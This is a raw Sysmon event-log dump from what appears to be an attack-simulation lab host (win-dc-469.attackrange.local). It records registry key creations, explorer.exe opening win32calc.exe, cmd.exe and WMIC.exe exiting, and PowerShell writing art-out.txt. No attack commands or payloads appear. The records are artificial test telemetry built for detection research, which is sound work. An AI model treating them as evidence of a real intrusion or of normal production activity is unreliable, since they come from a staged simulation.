12:18:52.586{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349594Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.586{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349593Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.586{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349592Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.586{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349591Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.586{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349590Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.586{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349589Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.586{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349588Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.586{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349587Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.586{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349586Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.586{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349585Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.586{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349584Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.586{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349583Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.586{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349582Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.586{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349581Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.586{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 13241300x800000000000000057349580Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.586{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x800000000000000057349579Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.586{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkrBinary Data 10341000x800000000000000057349578Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.586{8B6011A9-8B2B-618D-C0DA-04000000F101}873610080C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6165f|C:\Windows\System32\SHELL32.dll+62a85|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349577Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.586{8B6011A9-8B2B-618D-C0DA-04000000F101}873610080C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6299e|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349576Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.586{8B6011A9-8B2B-618D-C0DA-04000000F101}873610080C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618b4|C:\Windows\System32\SHELL32.dll+62967|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349575Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.586{8B6011A9-8898-6164-8400-00000000F101}49804104C:\Windows\System32\taskhostw.exe{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349574Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.571{8B6011A9-8898-6164-8400-00000000F101}49804104C:\Windows\System32\taskhostw.exe{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349573Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.571{8B6011A9-8898-6164-8400-00000000F101}49804104C:\Windows\System32\taskhostw.exe{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349572Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.571{8B6011A9-8898-6164-8400-00000000F101}49804104C:\Windows\System32\taskhostw.exe{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000057349571Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.571{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation\LastOrientationDWORD (0x00000000) 12241200x800000000000000057349570Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.571{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation 13241300x800000000000000057349569Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.571{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:0000000000180B3E\VirtualDesktopBinary Data 12241200x800000000000000057349568Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.571{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:0000000000180B3E 10341000x800000000000000057349567Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.571{8B6011A9-8B2B-618D-C0DA-04000000F101}87364068C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6165f|C:\Windows\System32\SHELL32.dll+62a85|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349566Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.571{8B6011A9-8B2B-618D-C0DA-04000000F101}87364068C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6299e|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349565Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.571{8B6011A9-8B2B-618D-C0DA-04000000F101}87364068C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618b4|C:\Windows\System32\SHELL32.dll+62967|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349564Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.571{8B6011A9-8B2B-618D-C0DA-04000000F101}87364068C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\explorer.exe+1f054|C:\Windows\explorer.exe+1f000|C:\Windows\explorer.exe+1dfec|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349563Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.571{8B6011A9-8B2B-618D-C0DA-04000000F101}87366804C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6165f|C:\Windows\System32\SHELL32.dll+62400|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349562Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.571{8B6011A9-8B2B-618D-C0DA-04000000F101}87364068C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6165f|C:\Windows\System32\SHELL32.dll+62a85|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000057349561Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.571{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000001A0B42\VirtualDesktopBinary Data 12241200x800000000000000057349560Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.571{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000001A0B42 10341000x800000000000000057349559Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.571{8B6011A9-8B2B-618D-C0DA-04000000F101}87364068C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6299e|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349558Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.571{8B6011A9-8B2B-618D-C0DA-04000000F101}87366804C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c00|C:\Windows\System32\SHELL32.dll+623bc|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349557Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.571{8B6011A9-8B2B-618D-C0DA-04000000F101}87364068C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618b4|C:\Windows\System32\SHELL32.dll+62967|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349556Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.571{8B6011A9-8B2B-618D-C0DA-04000000F101}87366804C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618b4|C:\Windows\System32\SHELL32.dll+62390|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349555Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.571{8B6011A9-8B2B-618D-C0DA-04000000F101}87366804C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349554Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.571{8B6011A9-8B2B-618D-C0DA-04000000F101}87364068C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\explorer.exe+1f054|C:\Windows\explorer.exe+1f000|C:\Windows\explorer.exe+1dfec|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349553Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.571{8B6011A9-8B2B-618D-C0DA-04000000F101}87366804C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6165f|C:\Windows\System32\SHELL32.dll+62400|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349552Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.571{8B6011A9-8B2B-618D-C0DA-04000000F101}87366804C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c00|C:\Windows\System32\SHELL32.dll+623bc|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349551Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.571{8B6011A9-8B2B-618D-C0DA-04000000F101}87366804C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618b4|C:\Windows\System32\SHELL32.dll+62390|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349550Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.571{8B6011A9-8B2B-618D-C0DA-04000000F101}87366804C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000057349549Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.563{8B6011A9-C6FA-616E-9B35-01000000F101}300ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=B844C972227A09BD98CFD4AF5A8729A9,SHA256=9C85121E96D8F0F323E92CFAF7E868295E7C41B77D9E34B0ADCC987E43B3F4E2falsetrue 534500x800000000000000057349548Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.507{8B6011A9-5BAB-618E-58F3-04000000F101}9304C:\Windows\System32\cmd.exe 534500x800000000000000057349547Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.505{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exe 12241200x800000000000000057349546Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.442{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057349545Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.442{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057349544Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.442{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057349543Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.442{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349542Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.442{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349541Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.442{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349540Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.442{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 